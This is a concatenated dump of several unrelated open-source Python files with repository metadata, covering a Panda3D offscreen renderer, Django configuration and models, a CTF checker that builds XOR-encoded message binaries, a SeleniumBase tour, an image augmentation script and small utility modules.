    def __init__(self, idx=0):
        self.index = idx
        win_props = WindowProperties()
        props = FrameBufferProperties()
        props.srgb_color = True
        props.stencil_bits = 1
        props.alpha_bits = 0
        props.aux_hrgba = 1
        # Offscreen buffer that tracks the host window's size and never opens
        # a window of its own (BF_refuse_window).
        self.output = base.graphics_engine.make_output(
            base.pipe, 'viewport{}-output'.format(self.index), -2,
            props, win_props,
            GraphicsPipe.BF_size_track_host | GraphicsPipe.BF_resizeable | GraphicsPipe.BF_refuse_window,
            base.win.gsg, base.win )
        Texture.set_textures_power_2(ATS_none)  # otherwise fullscreen triangle won't work
        # Combined depth/stencil attachment, sampled with clamped nearest
        # filtering so texel fetches in post shaders are exact.
        self.depth_stencil = Texture()
        self.output.get_fb_properties().setup_depth_texture(self.depth_stencil)
        self.depth_stencil.wrap_u = self.depth_stencil.wrap_v = self.depth_stencil.wrap_w = SamplerState.WM_clamp
        self.depth_stencil.magfilter = self.depth_stencil.minfilter = SamplerState.FT_nearest
        self.output.add_render_texture( self.depth_stencil, GraphicsOutput.RTM_bind_or_copy, GraphicsOutput.RTP_depth_stencil )
        # Color attachment, same sampling setup.
        self.color = Texture()
        self.output.get_fb_properties().setup_color_texture(self.color)
        self.color.wrap_u = self.color.wrap_v = self.color.wrap_w = SamplerState.WM_clamp
        self.color.magfilter = self.color.minfilter = SamplerState.FT_nearest
        self.output.add_render_texture( self.color, GraphicsOutput.RTM_bind_or_copy, GraphicsOutput.RTP_color )
        # Draw this buffer before outputs with a higher sort value.
        self.output.sort = self.index
        self.output.disable_clears()
        self.output.display_regions[0].disable_clears()
        self.output.set_clear_depth_active(True)
        self.output.clear_color = Vec4(0.0,0.5,0.0,0.0)
        self.output.set_clear_color_active(True)
        self.output.clear_delete_flag()
        # Point the main camera at this buffer; its newest display region is
        # the one created for us.
        base.make_camera( self.output, useCamera=base.cam )
        base.cam.node().display_regions[-1].disable_clears()
        #self.stencil = StencilAttrib.make( True, StencilAttrib.SCF_always, StencilAttrib.SO_zero, StencilAttrib.SO_replace, StencilAttrib.SO_replace, 1, 0, 1 )
        # Objects whose set_viewport_input() must be re-run on window resize.
        self.viewport_inputs = []

    def add_shader(self, vertex, fragment):
        """Install the scene shader; lazily adds the aux0 attachment and the
        'viewport' uniform only if the fragment source actually uses them."""
        if glsl_check_for_use( fragment, 'gl_FragData[1] =' ):
            # Shader writes a second output -> attach the aux HRGBA target.
            self.aux0 = Texture()
            self.aux0.wrap_u = self.aux0.wrap_v = self.aux0.wrap_w = SamplerState.WM_clamp
            self.aux0.magfilter = self.aux0.minfilter = SamplerState.FT_nearest
            self.output.add_render_texture( self.aux0, GraphicsOutput.RTM_bind_or_copy, GraphicsOutput.RTP_aux_hrgba_0 )
            self.output.set_clear_value(GraphicsOutput.RTP_aux_hrgba_0,Vec4(0.0,0.0,1024.0,0.0))
            self.output.set_clear_active(GraphicsOutput.RTP_aux_hrgba_0,True)
        self.shader = ShaderAttrib.make().set_shader(Shader.make( Shader.SLGLSL, vertex, fragment ))
        if glsl_check_for_use( fragment, 'uniform vec4 viewport;' ): self.add_viewport_input(self)
        else : base.cam.node().set_initial_state(RenderState.make_empty().add_attrib(self.shader))#.add_attrib(self.stencil))

    def calc_viewport_input(self, win):
        """Recompute the per-pixel ray scale/offset vector from the camera
        FOV and the current window size (stored in self.viewport)."""
        sclx = tan( radians( 0.5 * base.cam.node().get_lens().get_hfov() ) )
        scly = tan( radians( 0.5 * base.cam.node().get_lens().get_vfov() ) )
        self.viewport = Vec4( -2.0*sclx/(win.get_x_size()-1), -2.0*scly/(win.get_y_size()-1), sclx*(1.0+1.0/(win.get_x_size()-1)), scly*(1.0+1.0/(win.get_y_size()-1)) )

    def add_viewport_input(self, obj):
        """Register `obj` to receive viewport updates; installs the
        window-event hook on first registration."""
        if not self.viewport_inputs:
            base.accept( 'window-event', self.hook_window_event )
            self.calc_viewport_input(base.win)
        self.viewport_inputs.append(obj)
        obj.set_viewport_input(self.viewport)

    def hook_window_event(self, win):
        """Window resize handler: run the default handler, then push the
        recomputed viewport vector to every registered consumer."""
        base.windowEvent(win)
        self.calc_viewport_input(win)
        for o in self.viewport_inputs: o.set_viewport_input(self.viewport)

    def set_viewport_input(self, viewport):
        # Re-bind the uniform and reapply the state, since ShaderAttribs are
        # immutable (set_shader_input returns a new attrib).
        self.shader = self.shader.set_shader_input( 'viewport', viewport )
        base.cam.node().set_initial_state(RenderState.make_empty().add_attrib(self.shader))#.add_attrib(self.stencil))
class composer:
    """Full-screen pass that composites a viewport's textures onto render2d."""

    def __init__(self):
        # Single triangle with NO vertex data: positions must be generated by
        # the vertex shader, so it always covers the whole screen regardless
        # of resolution.
        geom = Geom(GeomVertexData( 'empty-vertices', GeomVertexFormat.get_empty(), GeomEnums.UH_static ))
        tri = GeomTriangles(GeomEnums.UH_static)
        tri.add_next_vertices(3)
        geom.add_primitive(tri)
        node = GeomNode('composer-full-screen-triangle')
        node.add_geom(geom) #, RenderState.make_empty().add_attrib(StencilAttrib.make( True, StencilAttrib.SCF_equal, StencilAttrib.SO_keep, StencilAttrib.SO_keep, StencilAttrib.SO_keep, 1, 1, 0 )) )
        # Infinite bounds + final: never culled, never bounds-tested.
        node.set_bounds(OmniBoundingVolume())
        node.final = True
        self.output = render2d.attach_new_node(node)

    def attach_viewport(self, viewport):
        """Bind a viewport's color texture as this pass's input texture."""
        self.viewport = viewport
        self.output.set_texture(self.viewport.color)

    def add_shader(self, vertex, fragment):
        """Install the composite shader and wire up only the inputs
        (aux0 texture, viewport uniform) the fragment source references."""
        self.output.set_shader(Shader.make( Shader.SLGLSL, vertex, fragment ))
        if glsl_check_for_use( fragment, 'uniform sampler2D aux0;' ) and hasattr( self.viewport, 'aux0' ): self.output.set_shader_input( 'aux0', self.viewport.aux0 )
        if glsl_check_for_use( fragment, 'uniform vec4 viewport;' ): self.viewport.add_viewport_input(self)

    def set_viewport_input(self, viewport): self.output.set_shader_input( 'viewport', viewport )
class Renderer(ShowBase):
    """ShowBase subclass that routes all 3-D rendering through an offscreen
    `viewport` and composites the result to the window via `composer`.
    """

    def __init__(self):
        # Coordinate-system prc settings must be loaded before ShowBase
        # creates the graphics context.
        load_prc_file_data('','coordinate-system yup_right' )
        load_prc_file_data('','gl-coordinate-system default')
        ShowBase.__init__(self)
        # Fallback white texture on stage 0 so untextured geometry samples a
        # defined color.
        render.set_texture( loader.load_texture('white.png'), 0 )
        # The window draws after the viewport buffer (sort 2 vs. the
        # viewport's sort == index) and its own 3-D region is disabled: the
        # scene only reaches the screen through the composer's 2-D pass.
        base.win.sort = 2
        base.win.disable_clears()
        base.win.display_regions[0].disable_clears()
        base.win.display_regions[0].active = False
        base.cam.node().display_regions[0].disable_clears()
        base.cam.node().display_regions[0].active = False
        base.cam2d.node().display_regions[0].disable_clears()
        render2d.set_two_sided(False)
        render2d.set_depth_write(False)
        render2d.set_depth_test(False)
        self.viewport = viewport()
        self.composer = composer()
        self.composer.attach_viewport(self.viewport)
| [
"noreply@github.com"
] | noreply@github.com |
e1202a8d6e06e1351e97305d751f7097572ef0b8 | 4a3b8c00d9d52bfb4743a525c230a7bae4766692 | /config/urls.py | c5c49726327c30a2c3dfb0b526c14f2146ee1ee8 | [
"MIT"
] | permissive | wapyce/wapyce | 36934f9ae234719cc0193e70f3638f77d0efd9e2 | abd8c85f40387aefa2a2e37ca44296ef086016a6 | refs/heads/master | 2020-03-31T03:26:47.928090 | 2018-10-29T16:26:18 | 2018-10-29T16:26:18 | 151,865,356 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,064 | py | """
Wapyce URL Configuration.
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import include
from django.urls import path

# Route table: admin UI, the versioned JSON APIs, the server-rendered
# validation pages, and the core app mounted at the site root. Django tries
# the patterns in order, so the empty prefix is listed last.
# pylint: disable=invalid-name
urlpatterns = [
    path('admin/', admin.site.urls),
    path('api/v1/validation/', include('wapyce.validation.api.urls')),
    path('api/v1/accessibility/', include('wapyce.accessibility.api.urls')),
    path('validation/', include('wapyce.validation.urls')),
    path('', include('wapyce.core.urls')),
]
| [
"carlsonsantana@gmail.com"
] | carlsonsantana@gmail.com |
093d9bd346d066a2828b59e9e5e6f7131c0e5c4c | 0cac9ab396358ce89271b651bbde6d7cbd219c21 | /discovery/discovery/wsgi.py | 69ac16c1bff20abbe4b39927189333d9441f3d91 | [] | no_license | tanmaygatle/IOT-Air-Quality-Monitoring-System | 956fce07afdf359b470aa82bf825b6f30ad8611a | d73254bd251e5c9550fb176017deeead4d749bea | refs/heads/master | 2022-10-19T17:23:59.001038 | 2020-06-11T15:24:20 | 2020-06-11T15:24:20 | 266,624,046 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 411 | py | """
WSGI config for discovery project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
# Point Django at the project settings (unless already configured in the
# environment) before building the module-level WSGI callable.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'discovery.settings')
application = get_wsgi_application()
| [
"tanmaygatle@gmail.com"
] | tanmaygatle@gmail.com |
46d07f77a3ed269d5cdade5ddc93f5aa2ed1312c | fe354018a25861cae72d992bcd75c5e60a21372a | /re10/diary/models.py | 5a26e16e393e2700064de6a50f205dbdc7850115 | [] | no_license | mhoshino38/pola | b218dba0621b364ca8e5a5600887f592bfb02af9 | 0bb220e3cf66a2f21cfe845780c5d5f985808d23 | refs/heads/master | 2020-06-30T13:43:53.221844 | 2019-08-06T12:18:47 | 2019-08-06T12:18:47 | 200,844,591 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 305 | py | from django.db import models
from django.utils import timezone
class Day(models.Model):
    # One diary entry: a short title, the entry body, and a creation
    # timestamp that defaults to "now" (timezone-aware via django.utils).
    title = models.CharField('Title', max_length=15)
    text = models.TextField('Text', max_length=200)
    date = models.DateTimeField('Date', default=timezone.now)

    def __str__(self):
        # Human-readable label used by the admin and shell.
        return self.title
| [
"noreply@github.com"
] | noreply@github.com |
b5c7e8a6d3939116d4a259600d6f18348004859d | bf53931505601b3e11edc80fd436a51f8ecdbbe2 | /checkers/Binder/checker_remote/checker/message_packers/simple_1/gen.py | b2a25907e3e087d7dc4b95e5bc3091616691ce59 | [
"MIT"
] | permissive | HITB-CyberWeek/proctf-2019 | 576ca55d4f8974767efb31e070af7147c29ee72d | 2d9acd1b255e8057db87928e51e0f94584fe55be | refs/heads/master | 2020-09-01T15:37:21.446225 | 2019-10-18T10:05:03 | 2019-10-18T10:05:03 | 218,994,529 | 4 | 2 | null | null | null | null | UTF-8 | Python | false | false | 1,962 | py |
import os,string,random
import subprocess as sp
from . import remote_runner
class Generator:
    """CTF-checker helper: builds small binaries that embed a message
    XOR-encrypted with a key derived from a password, and verifies that
    running the binary with the password prints the message back.
    """

    def __init__(self):
        # Remote sandbox used by verify(); credentials are checker-internal.
        self.runner = remote_runner.RemoteVerifier("10.60.31.102",3011,"test","sfdkjfds45a")

    def Generate(self, password, message, out_path, debug=False):
        """Compile a binary embedding `message` XOR-encrypted with the key.

        The key `kk` is the XOR of all password bytes; the encrypted bytes
        are rendered as a C array literal and passed to compile.sh together
        with the plaintext length, output path and key. Returns False if
        the compiler wrote anything to stderr, True otherwise.
        """
        kk = 0
        for p in password:
            kk = kk ^ ord(p)
        enc_mes = ""
        for c in message:
            enc_mes += chr(kk ^ ord(c))
        # Render the encrypted message as a NUL-terminated C hex array.
        ar = []
        for c in enc_mes:
            ar.append(hex(ord(c)))
        ar.append(hex(0))
        mes = "{%s}" %(",".join(ar))
        meslen = len(message)
        # compile.sh lives next to this module, so chdir there for the call
        # and restore the working directory afterwards.
        mod_dir = os.path.dirname(__file__)
        cur_dir = os.getcwd()
        if mod_dir != "":
            os.chdir(mod_dir)
        proc = sp.Popen(['./compile.sh',str(meslen),mes,out_path,str(kk)],\
                        stdout=sp.PIPE,stderr=sp.PIPE)
        out,err = proc.communicate()
        if debug:
            print("[DEBUG] Generate",password,message,out_path,out,err)
        os.chdir(cur_dir)
        if len(err.decode()) != 0:
            return False
        return True

    def verify2(self, password, message, file, debug=False):
        """Local verification: run `file` in the seccomp wrapper (7s kill
        timeout) and check the decrypted output contains `message`."""
        for i in range(3):
            # Append doubled random uppercase chars; doubling keeps the XOR
            # key unchanged (x ^ x == 0), so the binary still decrypts.
            c=random.choice(string.ascii_uppercase)
            password = password +c+c
        proc = sp.Popen(['timeout',"-s","KILL","7","./seccomp_test/wrapper",file,password],stdout=sp.PIPE)
        out = proc.communicate()
        if not message in out[0].decode():
            return False
        return True

    def verify(self, password, message, file, debug=False):
        """Remote verification: same doubled-character padding trick, but the
        binary is executed via the RemoteVerifier sandbox."""
        for i in range(2):
            c=random.choice(string.ascii_uppercase)
            password = password +c+c
        output = self.runner.RunUserBinary(file,password)
        if not message in output.decode():
            return False
        return True
if __name__ == "__main__":
    # Smoke test: build a binary embedding 'asdasd' keyed by 'qweqwe'.
    g=Generator()
    g.Generate("qweqwe",'asdasd',"mes2",True)
| [
"awengar@gmail.com"
] | awengar@gmail.com |
7b375c81b77e9b35c1623c3699790ed98d0b9a61 | 5c90b31943aff36cab344574b16575025e649b7e | /examples/tour_examples/xkcd_tour.py | 73632b0471a64d556c17914eda6f7e0bd123423f | [
"MIT"
] | permissive | 766/SeleniumBase | 7e23adb3d40cf3d9912e2ff0f4dd56c2fafdb29b | b81e7b93e16a9abee6d2386f55c97843aa90a7d9 | refs/heads/master | 2020-08-22T08:54:47.269550 | 2019-12-06T13:44:17 | 2019-12-06T13:44:17 | 216,360,246 | 1 | 0 | MIT | 2019-12-06T13:44:18 | 2019-10-20T12:43:47 | null | UTF-8 | Python | false | false | 1,051 | py | from seleniumbase import BaseCase
class MyTestClass(BaseCase):
    """SeleniumBase demo: build a Shepherd walkthrough of xkcd #1117,
    export it as JavaScript, then play it in the browser."""

    def test_basic(self):
        self.open('https://xkcd.com/1117/')
        # Sanity check that the comic actually loaded before touring.
        self.assert_element('img[alt="My Sky"]')
        self.create_shepherd_tour()
        # Steps without a selector attach to the page; the rest anchor to
        # specific elements.
        self.add_tour_step("Welcome to XKCD!")
        self.add_tour_step("This is the XKCD logo.", "#masthead img")
        self.add_tour_step("Here's the daily webcomic.", "#comic img")
        self.add_tour_step("This is the title.", "#ctitle", alignment="top")
        self.add_tour_step("Click here for the next comic.", 'a[rel="next"]')
        self.add_tour_step("Click here for the previous one.", 'a[rel="prev"]')
        self.add_tour_step("Learn about the author here.", 'a[rel="author"]')
        self.add_tour_step("Click here for the license.", 'a[rel="license"]')
        self.add_tour_step("Click for a random comic.", 'a[href*="/random/"]')
        self.add_tour_step("Thanks for taking this tour!")
        self.export_tour(filename="xkcd_tour.js")  # Exports the tour
        self.play_tour()  # Plays the tour
| [
"mdmintz@gmail.com"
] | mdmintz@gmail.com |
e82882454e7c7b079412b3a407adef7c35b5b239 | 501b6a773f82a44dba7e2393108c839e33b355a6 | /09_strings-and-text/09_05_new_friends_1.py | 9f584b942188cfc7da1a3894e2ec5626472c2738 | [] | no_license | Bat-Turtle/python-101 | fda2c79e3a270924f37494b25377b5645098a5c7 | 8f4582a5a9b398d2163c27aa8fe433efd8ff69fa | refs/heads/main | 2023-08-19T16:37:46.732125 | 2021-10-26T16:46:46 | 2021-10-26T16:46:46 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 67 | py | # Write code that produces a SyntaxError when you run this script.
| [
"breuss.martin@gmail.com"
] | breuss.martin@gmail.com |
2c50b80a79ede26179b05b15661a360e8989d621 | 31a76dee722a0ac480c66a140ad6174317673590 | /utils.py | 3f37a2ea92fac7bb70abd60a091b6901fa7ebcab | [
"BSD-3-Clause"
] | permissive | 84KaliPleXon3/pacu | 0daa9478efa06d66efba55f1423ece17600e4585 | c7a593508bce3a23a9e8bfb074b3a9e3273b0847 | refs/heads/master | 2023-05-07T02:13:16.002285 | 2020-07-23T22:28:13 | 2020-07-23T22:28:13 | 282,970,681 | 1 | 1 | BSD-3-Clause | 2021-06-02T02:39:41 | 2020-07-27T17:38:19 | Python | UTF-8 | Python | false | false | 2,416 | py | import signal
import sys
import datetime
from sqlalchemy import create_engine
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker
from core.base import DATABASE_CONNECTION_PATH
def get_database_connection(database_connection_path=DATABASE_CONNECTION_PATH):
    """Create and return a new SQLAlchemy session bound to the SQLite DB.

    Unlike database file paths, database connection paths must begin with
    sqlite:/// (enforced by the assert below).
    """
    assert database_connection_path.startswith('sqlite:///'), 'Database connection path must start with sqlite:///'

    engine = create_engine(database_connection_path)
    Base = declarative_base()
    Base.metadata.bind = engine
    Session = sessionmaker(bind=engine)
    # Each call returns a fresh session; the caller owns its lifecycle.
    return Session()
def remove_empty_from_dict(d):
    """Recursively drop falsy entries from nested dicts and lists.

    A value is kept only if it is truthy both before and after its own
    recursive cleaning. Non-container values are returned unchanged.
    Reference: https://stackoverflow.com/a/24893252
    """
    if type(d) is dict:
        pruned = {}
        for key, value in d.items():
            if value:
                cleaned = remove_empty_from_dict(value)
                if cleaned:
                    pruned[key] = cleaned
        return pruned
    if type(d) is list:
        kept = []
        for value in d:
            if value:
                cleaned = remove_empty_from_dict(value)
                if cleaned:
                    kept.append(cleaned)
        return kept
    return d
def stringify_datetime(obj):
    """Recursively replace datetime objects with formatted strings.

    sqlalchemy-utils' JSONType can't serialize Python datetimes, so any
    datetime found anywhere in a nested dict/list structure is rendered as
    e.g. 'Thu, 02 Jan 2020 03:04:05' before the ORM persists the data.
    Everything else passes through untouched.
    """
    if isinstance(obj, dict):
        # Rebuild the dict, converting each value in place.
        return {key: stringify_datetime(value) for key, value in obj.items()}
    if isinstance(obj, list):
        # Rebuild the list, converting each element in place.
        return [stringify_datetime(item) for item in obj]
    if isinstance(obj, datetime.datetime):
        return str(obj.strftime("%a, %d %b %Y %H:%M:%S"))
    return obj
def set_sigint_handler(exit_text=None, value=0):
    """Install a SIGINT handler that exits the process cleanly.

    Replaces the default KeyboardInterrupt traceback on CTRL+C with an
    optional farewell message and sys.exit(value).
    """
    def _graceful_exit(signum, frame):
        if exit_text is not None:
            print(exit_text)
        sys.exit(value)

    signal.signal(signal.SIGINT, _graceful_exit)
| [
"spencer.gietzen@rhinosecuritylabs.com"
] | spencer.gietzen@rhinosecuritylabs.com |
a5ee8b7271e9e0da6bd88f441dcf2a89f1596281 | aa3ce8a382f558da491a9b2805207e48a6799c7e | /augmentations.py | 65e0761e0cb83d303867247c74dbcf3fbd11d6cd | [] | no_license | shao15xiang/human_protein_atlas | 6c203ef7edc9c92b5934004f4a920ca0f04248a1 | 40d0211098ae75c7959e26e31ccc97531751cde2 | refs/heads/master | 2020-04-10T22:44:30.746683 | 2018-12-10T07:33:09 | 2018-12-10T07:33:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,420 | py | from albumentations import (
HorizontalFlip, IAAPerspective, ShiftScaleRotate, CLAHE, RandomRotate90,
Transpose, ShiftScaleRotate, Blur, OpticalDistortion, GridDistortion, HueSaturationValue,
IAAAdditiveGaussianNoise, GaussNoise, MotionBlur, MedianBlur, IAAPiecewiseAffine,
IAASharpen, IAAEmboss, RandomContrast, RandomBrightness, Flip, OneOf, Compose, ElasticTransform
)
from random import randrange
from random import randint
import numpy as np
from scipy.misc import imread
import matplotlib.pyplot as plt
import scipy.misc
from tqdm import tqdm_notebook, tqdm
def load_image(image_id='00383b44-bbbb-11e8-b2ba-ac1f6b6435d0'):
    """Load one Human Protein Atlas sample as a single 512x512x4 uint8 array.

    The dataset stores each sample as four grayscale PNGs; they are stacked
    into channels in the order green, blue, red, yellow.
    NOTE(review): the train path is hard-coded relative to the script's CWD.
    """
    path = '../DATASET/human_protein_atlas/all/train/'
    image = np.zeros(shape=(512, 512, 4), dtype=np.uint8)
    image[:, :, 0] = imread(path + image_id + "_green" + ".png")
    image[:, :, 1] = imread(path + image_id + "_blue" + ".png")
    image[:, :, 2] = imread(path + image_id + "_red" + ".png")
    image[:, :, 3] = imread(path + image_id + "_yellow" + ".png")
    return image
def strong_aug(p=0.5):
    """Build an albumentations pipeline of strong geometric + photometric
    augmentations; `p` is the probability the whole pipeline is applied.
    """
    return Compose([
        # Geometric: 90-degree rotations, flips, transpose, elastic warp.
        RandomRotate90(),
        Flip(),
        Transpose(),
        ElasticTransform(p=1.0),
        # Noise (one of, 20%).
        OneOf([
            IAAAdditiveGaussianNoise(),
            GaussNoise(),
        ], p=0.2),
        # Blur (one of, 20%).
        OneOf([
            MotionBlur(p=0.2),
            MedianBlur(blur_limit=3, p=0.1),
            Blur(blur_limit=3, p=0.1),
        ], p=0.2),
        ShiftScaleRotate(shift_limit=0.0625, scale_limit=0.2, rotate_limit=45, p=0.2),
        # Local distortions (one of, 20%).
        OneOf([
            OpticalDistortion(p=0.3),
            GridDistortion(p=0.1),
            IAAPiecewiseAffine(p=0.3),
        ], p=0.2),
        # Photometric: sharpen/emboss/contrast/brightness (one of, 30%).
        OneOf([
            # CLAHE(clip_limit=2),
            IAASharpen(),
            IAAEmboss(),
            RandomContrast(),
            RandomBrightness(),
        ], p=0.3),
        # HueSaturationValue(p=0.3),
    ], p=p)
# Script: save the original image, then generate up to 1000 augmented
# variants of it into ./augs/ under random filenames.
image = load_image()
scipy.misc.imsave(f'./augs/origing.jpg', image[:, :, :3])
whatever_data = "my name"
augmentation = strong_aug(p=1.0)
# `data` keeps a reference to the ORIGINAL image, so every iteration
# augments the unmodified source, not the previous result.
data = {"image": image}
for n in range(1000):
    # augmented = augmentation(**data)
    # image = augmented["image"]
    image = augmentation(**data)["image"]
    # print(f'shape={image.shape}')
    # Only save when a transform dropped the 4th channel to RGB.
    # NOTE(review): randint filenames can collide and silently overwrite.
    if image.shape[2] == 3:
        print(f'shape={image.shape}')
        scipy.misc.imsave(f'./augs/{randint(1, 100000000)}.jpg', image[:, :, :3])
    # plt.imshow(image[:, :, :3])
    # plt.show()
"igor.soldatov@gmail.com"
] | igor.soldatov@gmail.com |
5f3ee79f89fafb19dad9451f6cffe1c65b2d3829 | c947f34d61fe1e9a13d2278a96d44055b775cafa | /Practica3/max_crossing_subarray.py | ba92fc9f7766d2e63efdc4fd4e43ef97eaa5adef | [] | no_license | Gushley110/Analisis_de_Algoritmos | 7524bc35627def747e6cfd6bb6c85262e0d85304 | 8d00f76febf64ee66ff000243a240208620241c5 | refs/heads/master | 2020-03-17T08:21:29.465639 | 2018-05-15T00:16:49 | 2018-05-15T00:16:49 | 133,435,708 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 573 | py | def max_crossing_subarray(array,low,mid,high):
left = -10000
right = -10000
sum = 0
for i in range(mid,low-1,-1):
sum += array[i]
print("Left:",array[i])
if (sum > left):
left = sum
max_left = i
sum = 0
for j in range(mid+1,high):
sum += array[j]
print("Right:",array[j])
if (sum > right):
right = sum
max_right = j
return [max_left,max_right,left+right]
def main():
    # Demo driver: maximum subarray crossing the midpoint of `array`.
    array = [2, 3, 4, 5, 7]
    low = 0
    high = len(array)  # half-open upper bound
    mid = (low + high) // 2
    print(max_crossing_subarray(array,low,mid,high))

if __name__ == '__main__':
    main()
"gusley_dominator@hotmail.com"
] | gusley_dominator@hotmail.com |
840818ed1d4ca9614ddc8d07d9a5a898c8711762 | 8cd57eb880c6e774a79465023a7ca4590163b3bd | /db.py | ab84376bd4cff6f8c213438669dd070749536fe4 | [] | no_license | 0xanp/Blackjack | 57c389ac9224d7e6e54ae0f36cca5c742ce404da | eb6c27c2e9a8cac95c7d9e7e217c68f0184c35e9 | refs/heads/master | 2022-06-05T03:33:27.183525 | 2020-01-01T02:13:30 | 2020-01-01T02:13:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 321 | py | FILENAME = "money.txt"
def write_money(money):
with open(FILENAME, "w") as file:
file.write(str(money))
def read_money():
try:
with open(FILENAME, "r") as file:
line = file.readline()
money = float(line)
return money
except FileNotFoundError:
return None
| [
"anbinhpham110799@gmail.com"
] | anbinhpham110799@gmail.com |
406388d49c81933799d471eb501b9b1c2cc3f50f | 2dca600f76ecd234ab5a87aa23f4f924b48a9759 | /hello_cozmo.py | 438d9cc3ee4b2ca9773490e170b030311dbc6647 | [] | no_license | LCasta17/HelloCozmo | ac4edfca243b5f5e27a3b2428e2eaf996a3f99b4 | ada4be4b021ebe35e231fa4ae09d77935f773ae9 | refs/heads/master | 2021-05-02T12:50:25.565848 | 2018-11-27T22:42:01 | 2018-11-27T22:51:40 | 120,747,086 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 287 | py | #!/usr/bin/env python3
'''Merry Christmas
Make Cozmo say 'Merry Christmas' to Axel & Eléa.
'''
import cozmo
def cozmo_program(robot: cozmo.robot.Robot):
    # Speak the greeting aloud and block until Cozmo finishes talking.
    robot.say_text("Hello Axel and Eléa. I wish you a Merry Christmas!").wait_for_completed()

# Entry point: cozmo handles connection setup and runs our program.
cozmo.run_program(cozmo_program)
| [
"lcastanie@dhcp-100-97-61-128.svl.corp.google.com"
] | lcastanie@dhcp-100-97-61-128.svl.corp.google.com |
dc3a3df04d9eba2f8895e74b91128c8c0b6b8a41 | 6413fe58b04ac2a7efe1e56050ad42d0e688adc6 | /tempenv/lib/python3.7/site-packages/plotly/validators/scattergeo/marker/colorbar/_title.py | e584a0b07ef22e6fd0a89b476a1df8aef97c2e3d | [
"MIT"
] | permissive | tytechortz/Denver_temperature | 7f91e0ac649f9584147d59193568f6ec7efe3a77 | 9d9ea31cd7ec003e8431dcbb10a3320be272996d | refs/heads/master | 2022-12-09T06:22:14.963463 | 2019-10-09T16:30:52 | 2019-10-09T16:30:52 | 170,581,559 | 1 | 0 | MIT | 2022-06-21T23:04:21 | 2019-02-13T21:22:53 | Python | UTF-8 | Python | false | false | 1,264 | py | import _plotly_utils.basevalidators
# Auto-generated plotly validator for scattergeo.marker.colorbar.title; the
# data_docs string below is consumed at runtime and must not be edited.
class TitleValidator(_plotly_utils.basevalidators.TitleValidator):

    def __init__(
        self,
        plotly_name='title',
        parent_name='scattergeo.marker.colorbar',
        **kwargs
    ):
        super(TitleValidator, self).__init__(
            plotly_name=plotly_name,
            parent_name=parent_name,
            data_class_str=kwargs.pop('data_class_str', 'Title'),
            data_docs=kwargs.pop(
                'data_docs', """
            font
                Sets this color bar's title font. Note that the
                title's font used to be set by the now
                deprecated `titlefont` attribute.
            side
                Determines the location of color bar's title
                with respect to the color bar. Note that the
                title's location used to be set by the now
                deprecated `titleside` attribute.
            text
                Sets the title of the color bar. Note that
                before the existence of `title.text`, the
                title's contents used to be defined as the
                `title` attribute itself. This behavior has
                been deprecated.
            """
            ),
            **kwargs
        )
| [
"jmswank7@gmail.com"
] | jmswank7@gmail.com |
ffcbace8393906b7652d282087d796a02f36841c | b5bc2246081c4878f2c59ea9e517d63c9543ae02 | /twistedUtils.py | af3066b9268d533ee0de49f12304fdea743cf635 | [] | no_license | TheDeusGroup/generic-twisted-handler | e93496531c0fb3e654ae01a3d1d9669a469342e6 | 5fa6a9360614c9790b8cff481cafe104925e0820 | refs/heads/master | 2021-02-06T21:03:04.079694 | 2020-02-29T08:58:43 | 2020-02-29T08:58:43 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 646 | py | #########################
# utils func for Twisted Client and Server handlers
#########################
from const import BASE_MESSAGE, EnvMapping
import json
import copy
def buildMessage(event, kwargs=None):
    """Assemble the message dict exchanged between clients and servers.

    Starts from a deep copy of BASE_MESSAGE (so the template is never
    mutated), stamps in the event type under the EnvMapping.EVENT key,
    then folds in any extra fields the caller supplied.

    Inputs:
        event: str: type of event you are sending
        kwargs: dict: anything of interest you wish to send on
    Returns:
        dict: message to transfer between client and server
    """
    message = copy.deepcopy(BASE_MESSAGE)
    message[EnvMapping.EVENT.value] = event
    if kwargs:
        message.update(kwargs)
    return message
| [
"twvoegt92@gmail.com"
] | twvoegt92@gmail.com |
52487d8cf7c2315f041b691dcaaa4e0b2f68cfbb | 486244b49422ebea1a3b51d4fe9a6e59939cc86c | /MyAsyncHttp/coroutine_version/async_io_utils/http_request.py | 54cd25d109231380feeaf6a07033c105252a9181 | [] | no_license | heiwushi/MyAsyncHttp | 7d032b62174dbb146e3a48c39a42eae17a59ba46 | 19d157399e0b2cc5396e226797a4cd97bae9488e | refs/heads/wangchen | 2022-12-02T05:24:57.387304 | 2020-08-09T01:41:43 | 2020-08-09T01:41:43 | 275,340,901 | 1 | 0 | null | 2020-07-25T10:11:22 | 2020-06-27T09:37:16 | Python | UTF-8 | Python | false | false | 4,667 | py | from MyAsyncHttp.coroutine_version.loop import get_event_loop
import socket
from MyAsyncHttp.coroutine_version.fd_manger import FdManger
from MyAsyncHttp.coroutine_version.http_utils import parse_http_response_header
import select
from MyAsyncHttp.coroutine_version.future import Future
from collections import defaultdict
import traceback as tb
import logging
# Shared event loop driving every coroutine in this module.
loop = get_event_loop()
# Tracks fd -> socket ownership across connect/recv lifecycles.
fd_manager = FdManger()
DEFAULT_HEADER = {
    "CONNECTION": "close",  # keep-alive is not supported yet
}
HTTP_VERSION = "HTTP/1.1"
fd_callback_dict = defaultdict(dict)
